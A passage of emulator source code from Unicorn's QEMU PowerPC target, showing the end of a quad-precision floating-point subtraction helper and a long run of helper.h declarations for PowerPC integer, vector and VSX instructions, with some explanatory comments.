do_float_check_status(env, GETPC()); } void helper_xssubqp(CPUPPCState *env, uint32_t opcode, ppc_vsr_t *xt, ppc_vsr_t *xa, ppc_vsr_t *xb) { ppc_vsr_t t = *xt; float_status tstat; helper_reset_fpstatus(env); tstat = env->fp_status; if (unlikely(Rc(opcode) != 0)) { tstat.float_rounding_mode = float_round_to_odd; } set_float_exception_flags(0, &tstat); t.f128 = float128_sub(xa->f128, xb->f128, &tstat); env->fp_status.float_exception_flags |= tstat.float_exception_flags; if (unlikely(tstat.float_exception_flags & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float128_classify(xa->f128) | float128_classify(xb->f128)); } helper_compute_fprf_float128(env, t.f128); *xt = t; do_float_check_status(env, GETPC()); } 
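/*
 * Editor's note -- illustrative sketch, not part of the original sources:
 * the quad-precision helpers above (helper_xsrqpi, helper_xsrqpxp,
 * helper_xssqrtqp, helper_xssubqp) all share one pattern: they run the
 * softfloat operation on a scratch copy of env->fp_status, so that a
 * forced rounding mode (float_round_to_odd when Rc(opcode) != 0) and the
 * per-operation exception flags never clobber the live FPSCR state, and
 * then OR the collected flags back.  The toy_* names below are
 * hypothetical stand-ins for the QEMU types and are deliberately kept
 * out of the build.
 */
#if 0 /* documentation sketch only */
typedef struct {
    int rounding_mode;       /* e.g. TOY_ROUND_ODD (hypothetical)     */
    int exception_flags;     /* sticky flag bits, OR-accumulated      */
} toy_fp_status;

static uint64_t toy_quad_op(toy_fp_status *live, uint64_t b, int round_odd)
{
    toy_fp_status tstat = *live;            /* scratch copy           */
    if (round_odd) {
        tstat.rounding_mode = TOY_ROUND_ODD;
    }
    tstat.exception_flags = 0;              /* collect this op only   */
    uint64_t r = toy_sqrt(b, &tstat);       /* softfloat-style call   */
    live->exception_flags |= tstat.exception_flags; /* merge back     */
    return r;
}
#endif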
unicorn-2.1.1/qemu/target/ppc/helper.h000066400000000000000000001013351467524106700176560ustar00rootroot00000000000000DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64)
DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64)
DEF_HELPER_FLAGS_3(raise_exception_err, TCG_CALL_NO_WG, void, env, i32, i32)
DEF_HELPER_FLAGS_2(raise_exception, TCG_CALL_NO_WG, void, env, i32)
DEF_HELPER_FLAGS_4(tw, TCG_CALL_NO_WG, void, env, tl, tl, i32)
#if defined(TARGET_PPC64)
DEF_HELPER_FLAGS_4(td, TCG_CALL_NO_WG, void, env, tl, tl, i32)
#endif
DEF_HELPER_2(store_msr, void, env, tl)
DEF_HELPER_1(rfi, void, env)
DEF_HELPER_1(rfsvc, void, env)
DEF_HELPER_1(40x_rfci, void, env)
DEF_HELPER_1(rfci, void, env)
DEF_HELPER_1(rfdi, void, env)
DEF_HELPER_1(rfmci, void, env)
#if defined(TARGET_PPC64)
DEF_HELPER_2(pminsn, void, env, i32)
DEF_HELPER_1(rfid, void, env)
DEF_HELPER_1(hrfid, void, env)
DEF_HELPER_2(store_lpcr, void, env, tl)
DEF_HELPER_2(store_pcr, void, env, tl)
#endif
DEF_HELPER_1(check_tlb_flush_local, void, env)
DEF_HELPER_1(check_tlb_flush_global, void, env)
DEF_HELPER_3(lmw, void, env, tl, i32)
DEF_HELPER_FLAGS_3(stmw, TCG_CALL_NO_WG, void, env, tl, i32)
DEF_HELPER_4(lsw, void, env, tl, i32, i32)
DEF_HELPER_5(lswx, void, env, tl, i32, i32, i32)
DEF_HELPER_FLAGS_4(stsw, TCG_CALL_NO_WG, void, env, tl, i32, i32)
DEF_HELPER_FLAGS_3(dcbz, TCG_CALL_NO_WG, void, env, tl, i32)
DEF_HELPER_FLAGS_3(dcbzep, TCG_CALL_NO_WG, void, env, tl, i32)
DEF_HELPER_FLAGS_2(icbi, TCG_CALL_NO_WG, void, env, tl)
DEF_HELPER_FLAGS_2(icbiep, TCG_CALL_NO_WG, void, env, tl)
DEF_HELPER_5(lscbx, tl, env, tl, i32, i32, i32)
#if defined(TARGET_PPC64)
DEF_HELPER_4(divdeu, i64, env, i64, i64, i32)
DEF_HELPER_4(divde, i64, env, i64, i64, i32)
#endif
DEF_HELPER_4(divweu, tl, env, tl, tl, i32)
DEF_HELPER_4(divwe, tl, env, tl, tl, i32)
DEF_HELPER_FLAGS_1(popcntb, TCG_CALL_NO_RWG_SE, tl, tl)
DEF_HELPER_FLAGS_2(cmpb, TCG_CALL_NO_RWG_SE, tl, tl, tl)
DEF_HELPER_3(sraw, tl, env, tl, tl)
#if defined(TARGET_PPC64)
DEF_HELPER_FLAGS_2(cmpeqb, TCG_CALL_NO_RWG_SE, i32, tl, tl)
DEF_HELPER_FLAGS_1(popcntw, TCG_CALL_NO_RWG_SE, tl, tl)
DEF_HELPER_FLAGS_2(bpermd, TCG_CALL_NO_RWG_SE, i64, i64, i64)
DEF_HELPER_3(srad, tl, env, tl, tl)
DEF_HELPER_0(darn32, tl)
DEF_HELPER_0(darn64, tl)
#endif
DEF_HELPER_FLAGS_1(cntlsw32, TCG_CALL_NO_RWG_SE, i32, i32)
DEF_HELPER_FLAGS_1(cntlzw32, TCG_CALL_NO_RWG_SE, i32, i32)
DEF_HELPER_FLAGS_2(brinc, TCG_CALL_NO_RWG_SE, tl, tl, tl)
DEF_HELPER_1(float_check_status, void, env)
DEF_HELPER_1(reset_fpstatus, void, env)
DEF_HELPER_2(compute_fprf_float64, void, env, i64)
DEF_HELPER_3(store_fpscr, void, env, i64, i32)
DEF_HELPER_2(fpscr_clrbit, void, env, i32)
DEF_HELPER_2(fpscr_setbit, void, env, i32)
DEF_HELPER_FLAGS_1(todouble, TCG_CALL_NO_RWG_SE, i64, i32)
DEF_HELPER_FLAGS_1(tosingle, TCG_CALL_NO_RWG_SE, i32, i64)
DEF_HELPER_4(fcmpo, void, env, i64, i64, i32)
DEF_HELPER_4(fcmpu, void, env, i64, i64, i32)
DEF_HELPER_2(fctiw, i64, env, i64)
DEF_HELPER_2(fctiwu, i64, env, i64)
DEF_HELPER_2(fctiwz, i64, env, i64)
DEF_HELPER_2(fctiwuz, i64, env, i64)
DEF_HELPER_2(fcfid, i64, env, i64)
DEF_HELPER_2(fcfidu, 
i64, env, i64) DEF_HELPER_2(fcfids, i64, env, i64) DEF_HELPER_2(fcfidus, i64, env, i64) DEF_HELPER_2(fctid, i64, env, i64) DEF_HELPER_2(fctidu, i64, env, i64) DEF_HELPER_2(fctidz, i64, env, i64) DEF_HELPER_2(fctiduz, i64, env, i64) DEF_HELPER_2(frsp, i64, env, i64) DEF_HELPER_2(frin, i64, env, i64) DEF_HELPER_2(friz, i64, env, i64) DEF_HELPER_2(frip, i64, env, i64) DEF_HELPER_2(frim, i64, env, i64) DEF_HELPER_3(fadd, f64, env, f64, f64) DEF_HELPER_3(fsub, f64, env, f64, f64) DEF_HELPER_3(fmul, f64, env, f64, f64) DEF_HELPER_3(fdiv, f64, env, f64, f64) DEF_HELPER_4(fmadd, i64, env, i64, i64, i64) DEF_HELPER_4(fmsub, i64, env, i64, i64, i64) DEF_HELPER_4(fnmadd, i64, env, i64, i64, i64) DEF_HELPER_4(fnmsub, i64, env, i64, i64, i64) DEF_HELPER_2(fsqrt, f64, env, f64) DEF_HELPER_2(fre, i64, env, i64) DEF_HELPER_2(fres, i64, env, i64) DEF_HELPER_2(frsqrte, i64, env, i64) DEF_HELPER_4(fsel, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_2(ftdiv, TCG_CALL_NO_RWG_SE, i32, i64, i64) DEF_HELPER_FLAGS_1(ftsqrt, TCG_CALL_NO_RWG_SE, i32, i64) #define dh_alias_avr ptr #define dh_ctype_avr ppc_avr_t * #define dh_is_signed_avr dh_is_signed_ptr #define dh_alias_vsr ptr #define dh_ctype_vsr ppc_vsr_t * #define dh_is_signed_vsr dh_is_signed_ptr DEF_HELPER_3(vavgub, void, avr, avr, avr) DEF_HELPER_3(vavguh, void, avr, avr, avr) DEF_HELPER_3(vavguw, void, avr, avr, avr) DEF_HELPER_3(vabsdub, void, avr, avr, avr) DEF_HELPER_3(vabsduh, void, avr, avr, avr) DEF_HELPER_3(vabsduw, void, avr, avr, avr) DEF_HELPER_3(vavgsb, void, avr, avr, avr) DEF_HELPER_3(vavgsh, void, avr, avr, avr) DEF_HELPER_3(vavgsw, void, avr, avr, avr) DEF_HELPER_4(vcmpequb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequd, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnew, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtub, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtud, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsb, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsh, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsw, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsd, void, env, avr, avr, avr) DEF_HELPER_4(vcmpeqfp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgefp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtfp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpbfp, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpequd_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpneh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnew_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpnezw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtub_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuh_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtuw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtud_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsb_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsh_dot, void, env, avr, avr, avr) 
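/*
 * Editor's note (added commentary, not in the original header): the
 * "_dot" entries in this block are the record forms (Rc = 1) of the
 * vcmp* instructions, which additionally update CR6.  Each
 * DEF_HELPER_<N> line is expanded into a C prototype by the
 * exec/helper-proto.h machinery using the dh_* aliases defined earlier
 * in this file; for instance
 * DEF_HELPER_4(vcmpequb, void, env, avr, avr, avr) yields, roughly:
 *
 *     void helper_vcmpequb(CPUPPCState *env, ppc_avr_t *r,
 *                          ppc_avr_t *a, ppc_avr_t *b);
 *
 * (a sketch of the generated shape, matching the VCMP_DO definitions
 * in int_helper.c, not a verbatim expansion).
 */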
DEF_HELPER_4(vcmpgtsw_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtsd_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpeqfp_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgefp_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpgtfp_dot, void, env, avr, avr, avr) DEF_HELPER_4(vcmpbfp_dot, void, env, avr, avr, avr) DEF_HELPER_3(vmrglb, void, avr, avr, avr) DEF_HELPER_3(vmrglh, void, avr, avr, avr) DEF_HELPER_3(vmrglw, void, avr, avr, avr) DEF_HELPER_3(vmrghb, void, avr, avr, avr) DEF_HELPER_3(vmrghh, void, avr, avr, avr) DEF_HELPER_3(vmrghw, void, avr, avr, avr) DEF_HELPER_3(vmulesb, void, avr, avr, avr) DEF_HELPER_3(vmulesh, void, avr, avr, avr) DEF_HELPER_3(vmulesw, void, avr, avr, avr) DEF_HELPER_3(vmuleub, void, avr, avr, avr) DEF_HELPER_3(vmuleuh, void, avr, avr, avr) DEF_HELPER_3(vmuleuw, void, avr, avr, avr) DEF_HELPER_3(vmulosb, void, avr, avr, avr) DEF_HELPER_3(vmulosh, void, avr, avr, avr) DEF_HELPER_3(vmulosw, void, avr, avr, avr) DEF_HELPER_3(vmuloub, void, avr, avr, avr) DEF_HELPER_3(vmulouh, void, avr, avr, avr) DEF_HELPER_3(vmulouw, void, avr, avr, avr) DEF_HELPER_3(vmuluwm, void, avr, avr, avr) DEF_HELPER_3(vslo, void, avr, avr, avr) DEF_HELPER_3(vsro, void, avr, avr, avr) DEF_HELPER_3(vsrv, void, avr, avr, avr) DEF_HELPER_3(vslv, void, avr, avr, avr) DEF_HELPER_3(vaddcuw, void, avr, avr, avr) DEF_HELPER_2(vprtybw, void, avr, avr) DEF_HELPER_2(vprtybd, void, avr, avr) DEF_HELPER_2(vprtybq, void, avr, avr) DEF_HELPER_3(vsubcuw, void, avr, avr, avr) DEF_HELPER_FLAGS_5(vaddsbs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vaddshs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vaddsws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubsbs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubshs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubsws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vaddubs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vadduhs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vadduws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsububs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubuhs, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_FLAGS_5(vsubuws, TCG_CALL_NO_RWG, void, avr, avr, avr, avr, i32) DEF_HELPER_3(vadduqm, void, avr, avr, avr) DEF_HELPER_4(vaddecuq, void, avr, avr, avr, avr) DEF_HELPER_4(vaddeuqm, void, avr, avr, avr, avr) DEF_HELPER_3(vaddcuq, void, avr, avr, avr) DEF_HELPER_3(vsubuqm, void, avr, avr, avr) DEF_HELPER_4(vsubecuq, void, avr, avr, avr, avr) DEF_HELPER_4(vsubeuqm, void, avr, avr, avr, avr) DEF_HELPER_3(vsubcuq, void, avr, avr, avr) DEF_HELPER_3(vrlb, void, avr, avr, avr) DEF_HELPER_3(vrlh, void, avr, avr, avr) DEF_HELPER_3(vrlw, void, avr, avr, avr) DEF_HELPER_3(vrld, void, avr, avr, avr) DEF_HELPER_4(vsldoi, void, avr, avr, avr, i32) DEF_HELPER_3(vextractub, void, avr, avr, i32) DEF_HELPER_3(vextractuh, void, avr, avr, i32) DEF_HELPER_3(vextractuw, void, avr, avr, i32) DEF_HELPER_3(vextractd, void, avr, avr, i32) DEF_HELPER_3(vinsertb, void, avr, avr, i32) DEF_HELPER_3(vinserth, void, avr, avr, i32) DEF_HELPER_3(vinsertw, void, avr, avr, i32) DEF_HELPER_3(vinsertd, void, avr, avr, i32) DEF_HELPER_2(vextsb2w, void, avr, avr) DEF_HELPER_2(vextsh2w, void, avr, avr) DEF_HELPER_2(vextsb2d, void, avr, avr) DEF_HELPER_2(vextsh2d, void, avr, avr) DEF_HELPER_2(vextsw2d, void, avr, avr) DEF_HELPER_2(vnegw, void, 
avr, avr) DEF_HELPER_2(vnegd, void, avr, avr) DEF_HELPER_2(vupkhpx, void, avr, avr) DEF_HELPER_2(vupklpx, void, avr, avr) DEF_HELPER_2(vupkhsb, void, avr, avr) DEF_HELPER_2(vupkhsh, void, avr, avr) DEF_HELPER_2(vupkhsw, void, avr, avr) DEF_HELPER_2(vupklsb, void, avr, avr) DEF_HELPER_2(vupklsh, void, avr, avr) DEF_HELPER_2(vupklsw, void, avr, avr) DEF_HELPER_5(vmsumubm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsummbm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vsel, void, env, avr, avr, avr, avr) DEF_HELPER_5(vperm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vpermr, void, env, avr, avr, avr, avr) DEF_HELPER_4(vpkshss, void, env, avr, avr, avr) DEF_HELPER_4(vpkshus, void, env, avr, avr, avr) DEF_HELPER_4(vpkswss, void, env, avr, avr, avr) DEF_HELPER_4(vpkswus, void, env, avr, avr, avr) DEF_HELPER_4(vpksdss, void, env, avr, avr, avr) DEF_HELPER_4(vpksdus, void, env, avr, avr, avr) DEF_HELPER_4(vpkuhus, void, env, avr, avr, avr) DEF_HELPER_4(vpkuwus, void, env, avr, avr, avr) DEF_HELPER_4(vpkudus, void, env, avr, avr, avr) DEF_HELPER_4(vpkuhum, void, env, avr, avr, avr) DEF_HELPER_4(vpkuwum, void, env, avr, avr, avr) DEF_HELPER_4(vpkudum, void, env, avr, avr, avr) DEF_HELPER_3(vpkpx, void, avr, avr, avr) DEF_HELPER_5(vmhaddshs, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmhraddshs, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumuhm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumuhs, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumshm, void, env, avr, avr, avr, avr) DEF_HELPER_5(vmsumshs, void, env, avr, avr, avr, avr) DEF_HELPER_4(vmladduhm, void, avr, avr, avr, avr) DEF_HELPER_FLAGS_2(mtvscr, TCG_CALL_NO_RWG, void, env, i32) DEF_HELPER_FLAGS_1(mfvscr, TCG_CALL_NO_RWG, i32, env) DEF_HELPER_3(lvebx, void, env, avr, tl) DEF_HELPER_3(lvehx, void, env, avr, tl) DEF_HELPER_3(lvewx, void, env, avr, tl) DEF_HELPER_3(stvebx, void, env, avr, tl) DEF_HELPER_3(stvehx, void, env, avr, tl) DEF_HELPER_3(stvewx, void, env, avr, tl) #if defined(TARGET_PPC64) DEF_HELPER_4(lxvl, void, env, tl, vsr, tl) DEF_HELPER_4(lxvll, void, env, tl, vsr, tl) DEF_HELPER_4(stxvl, void, env, tl, vsr, tl) DEF_HELPER_4(stxvll, void, env, tl, vsr, tl) #endif DEF_HELPER_4(vsumsws, void, env, avr, avr, avr) DEF_HELPER_4(vsum2sws, void, env, avr, avr, avr) DEF_HELPER_4(vsum4sbs, void, env, avr, avr, avr) DEF_HELPER_4(vsum4shs, void, env, avr, avr, avr) DEF_HELPER_4(vsum4ubs, void, env, avr, avr, avr) DEF_HELPER_4(vaddfp, void, env, avr, avr, avr) DEF_HELPER_4(vsubfp, void, env, avr, avr, avr) DEF_HELPER_4(vmaxfp, void, env, avr, avr, avr) DEF_HELPER_4(vminfp, void, env, avr, avr, avr) DEF_HELPER_3(vrefp, void, env, avr, avr) DEF_HELPER_3(vrsqrtefp, void, env, avr, avr) DEF_HELPER_3(vrlwmi, void, avr, avr, avr) DEF_HELPER_3(vrldmi, void, avr, avr, avr) DEF_HELPER_3(vrldnm, void, avr, avr, avr) DEF_HELPER_3(vrlwnm, void, avr, avr, avr) DEF_HELPER_5(vmaddfp, void, env, avr, avr, avr, avr) DEF_HELPER_5(vnmsubfp, void, env, avr, avr, avr, avr) DEF_HELPER_3(vexptefp, void, env, avr, avr) DEF_HELPER_3(vlogefp, void, env, avr, avr) DEF_HELPER_3(vrfim, void, env, avr, avr) DEF_HELPER_3(vrfin, void, env, avr, avr) DEF_HELPER_3(vrfip, void, env, avr, avr) DEF_HELPER_3(vrfiz, void, env, avr, avr) DEF_HELPER_4(vcfux, void, env, avr, avr, i32) DEF_HELPER_4(vcfsx, void, env, avr, avr, i32) DEF_HELPER_4(vctuxs, void, env, avr, avr, i32) DEF_HELPER_4(vctsxs, void, env, avr, avr, i32) DEF_HELPER_2(vclzb, void, avr, avr) DEF_HELPER_2(vclzh, void, avr, avr) DEF_HELPER_2(vctzb, void, avr, avr) DEF_HELPER_2(vctzh, void, avr, avr) 
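/*
 * Editor's note (added commentary, not in the original header): the
 * vclz and vctz helpers around this point count leading/trailing zeros
 * independently in every vector lane.  A hedged sketch of a byte-lane
 * count-leading-zeros loop (the actual int_helper.c bodies may be
 * written differently):
 *
 *     for (i = 0; i < 16; i++) {
 *         r->u8[i] = b->u8[i] ? __builtin_clz(b->u8[i]) - 24 : 8;
 *     }
 *
 * __builtin_clz sees the byte zero-extended to 32 bits, hence the 24
 * excess leading zeros subtracted; the zero byte is special-cased
 * because clz(0) is undefined.
 */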
DEF_HELPER_2(vctzw, void, avr, avr) DEF_HELPER_2(vctzd, void, avr, avr) DEF_HELPER_2(vpopcntb, void, avr, avr) DEF_HELPER_2(vpopcnth, void, avr, avr) DEF_HELPER_2(vpopcntw, void, avr, avr) DEF_HELPER_2(vpopcntd, void, avr, avr) DEF_HELPER_1(vclzlsbb, tl, avr) DEF_HELPER_1(vctzlsbb, tl, avr) DEF_HELPER_3(vbpermd, void, avr, avr, avr) DEF_HELPER_3(vbpermq, void, avr, avr, avr) DEF_HELPER_3(vpmsumb, void, avr, avr, avr) DEF_HELPER_3(vpmsumh, void, avr, avr, avr) DEF_HELPER_3(vpmsumw, void, avr, avr, avr) DEF_HELPER_3(vpmsumd, void, avr, avr, avr) DEF_HELPER_2(vextublx, tl, tl, avr) DEF_HELPER_2(vextuhlx, tl, tl, avr) DEF_HELPER_2(vextuwlx, tl, tl, avr) DEF_HELPER_2(vextubrx, tl, tl, avr) DEF_HELPER_2(vextuhrx, tl, tl, avr) DEF_HELPER_2(vextuwrx, tl, tl, avr) DEF_HELPER_2(vsbox, void, avr, avr) DEF_HELPER_3(vcipher, void, avr, avr, avr) DEF_HELPER_3(vcipherlast, void, avr, avr, avr) DEF_HELPER_3(vncipher, void, avr, avr, avr) DEF_HELPER_3(vncipherlast, void, avr, avr, avr) DEF_HELPER_3(vshasigmaw, void, avr, avr, i32) DEF_HELPER_3(vshasigmad, void, avr, avr, i32) DEF_HELPER_4(vpermxor, void, avr, avr, avr, avr) DEF_HELPER_4(bcdadd, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdsub, i32, avr, avr, avr, i32) DEF_HELPER_3(bcdcfn, i32, avr, avr, i32) DEF_HELPER_3(bcdctn, i32, avr, avr, i32) DEF_HELPER_3(bcdcfz, i32, avr, avr, i32) DEF_HELPER_3(bcdctz, i32, avr, avr, i32) DEF_HELPER_3(bcdcfsq, i32, avr, avr, i32) DEF_HELPER_3(bcdctsq, i32, avr, avr, i32) DEF_HELPER_4(bcdcpsgn, i32, avr, avr, avr, i32) DEF_HELPER_3(bcdsetsgn, i32, avr, avr, i32) DEF_HELPER_4(bcds, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdus, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdsr, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdtrunc, i32, avr, avr, avr, i32) DEF_HELPER_4(bcdutrunc, i32, avr, avr, avr, i32) DEF_HELPER_4(xsadddp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsaddqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_4(xssubdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsmuldp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsmulqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_4(xsdivdp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsdivqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_3(xsredp, void, env, vsr, vsr) DEF_HELPER_3(xssqrtdp, void, env, vsr, vsr) DEF_HELPER_3(xsrsqrtedp, void, env, vsr, vsr) DEF_HELPER_4(xstdivdp, void, env, i32, vsr, vsr) DEF_HELPER_3(xstsqrtdp, void, env, i32, vsr) DEF_HELPER_5(xsmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsmsubdp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmsubdp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_4(xscmpeqdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpgtdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpgedp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpnedp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xscmpexpdp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpexpqp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpodp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpudp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpoqp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscmpuqp, void, env, i32, vsr, vsr) DEF_HELPER_4(xsmaxdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsmindp, void, env, vsr, vsr, vsr) DEF_HELPER_5(xsmaxcdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_5(xsmincdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_5(xsmaxjdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_5(xsminjdp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_3(xscvdphp, void, env, vsr, vsr) DEF_HELPER_4(xscvdpqp, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvdpsp, void, env, vsr, vsr) DEF_HELPER_2(xscvdpspn, 
i64, env, i64) DEF_HELPER_4(xscvqpdp, void, env, i32, vsr, vsr) DEF_HELPER_4(xscvqpsdz, void, env, i32, vsr, vsr) DEF_HELPER_4(xscvqpswz, void, env, i32, vsr, vsr) DEF_HELPER_4(xscvqpudz, void, env, i32, vsr, vsr) DEF_HELPER_4(xscvqpuwz, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvhpdp, void, env, vsr, vsr) DEF_HELPER_4(xscvsdqp, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvspdp, void, env, vsr, vsr) DEF_HELPER_2(xscvspdpn, i64, env, i64) DEF_HELPER_3(xscvdpsxds, void, env, vsr, vsr) DEF_HELPER_3(xscvdpsxws, void, env, vsr, vsr) DEF_HELPER_3(xscvdpuxds, void, env, vsr, vsr) DEF_HELPER_3(xscvdpuxws, void, env, vsr, vsr) DEF_HELPER_3(xscvsxddp, void, env, vsr, vsr) DEF_HELPER_3(xscvuxdsp, void, env, vsr, vsr) DEF_HELPER_3(xscvsxdsp, void, env, vsr, vsr) DEF_HELPER_4(xscvudqp, void, env, i32, vsr, vsr) DEF_HELPER_3(xscvuxddp, void, env, vsr, vsr) DEF_HELPER_3(xststdcsp, void, env, i32, vsr) DEF_HELPER_2(xststdcdp, void, env, i32) DEF_HELPER_2(xststdcqp, void, env, i32) DEF_HELPER_3(xsrdpi, void, env, vsr, vsr) DEF_HELPER_3(xsrdpic, void, env, vsr, vsr) DEF_HELPER_3(xsrdpim, void, env, vsr, vsr) DEF_HELPER_3(xsrdpip, void, env, vsr, vsr) DEF_HELPER_3(xsrdpiz, void, env, vsr, vsr) DEF_HELPER_4(xsrqpi, void, env, i32, vsr, vsr) DEF_HELPER_4(xsrqpxp, void, env, i32, vsr, vsr) DEF_HELPER_4(xssqrtqp, void, env, i32, vsr, vsr) DEF_HELPER_5(xssubqp, void, env, i32, vsr, vsr, vsr) DEF_HELPER_4(xsaddsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xssubsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsmulsp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xsdivsp, void, env, vsr, vsr, vsr) DEF_HELPER_3(xsresp, void, env, vsr, vsr) DEF_HELPER_2(xsrsp, i64, env, i64) DEF_HELPER_3(xssqrtsp, void, env, vsr, vsr) DEF_HELPER_3(xsrsqrtesp, void, env, vsr, vsr) DEF_HELPER_5(xsmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmaddsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xsnmsubsp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_4(xvadddp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvsubdp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvmuldp, void, env, vsr, vsr, vsr) DEF_HELPER_4(xvdivdp, void, env, vsr, vsr, vsr) DEF_HELPER_3(xvredp, void, env, vsr, vsr) DEF_HELPER_3(xvsqrtdp, void, env, vsr, vsr) DEF_HELPER_3(xvrsqrtedp, void, env, vsr, vsr) DEF_HELPER_4(xvtdivdp, void, env, i32, vsr, vsr) DEF_HELPER_3(xvtsqrtdp, void, env, i32, vsr) DEF_HELPER_5(xvmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvmsubdp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmadddp, void, env, vsr, vsr, vsr, vsr) DEF_HELPER_5(xvnmsubdp, void, env, 